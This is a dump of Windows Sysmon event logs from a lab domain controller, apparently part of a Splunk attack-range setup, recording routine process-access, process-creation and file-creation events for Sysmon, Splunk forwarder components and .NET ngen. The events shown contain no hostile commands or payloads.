13:48:48.106{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.106{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:48.106{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.106{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91C0-6005-0D03-00000000A301}4588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.106{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91C0-6005-0D03-00000000A301}4588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.107{59A5CD1D-91C0-6005-0D03-00000000A301}4588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.887{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91C1-6005-1103-00000000A301}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:49.887{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.887{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:49.887{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.887{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:49.887{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.887{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:49.887{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.887{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:49.887{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.887{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91C1-6005-1103-00000000A301}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.887{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91C1-6005-1103-00000000A301}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.888{59A5CD1D-91C1-6005-1103-00000000A301}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:49.278{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C1-6005-1003-00000000A301}3232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.262{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91C1-6005-1003-00000000A301}3232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:49.262{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C1-6005-1003-00000000A301}3232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:55.372{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C7-6005-1203-00000000A301}2640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:55.356{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91C7-6005-1203-00000000A301}2640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:55.356{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C7-6005-1203-00000000A301}2640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:54.997{59A5CD1D-91C1-6005-1003-00000000A301}3232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ca0-0\System.Windows.Forms.dll2021-01-18 13:48:54.997 10341000x80000000000000007371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
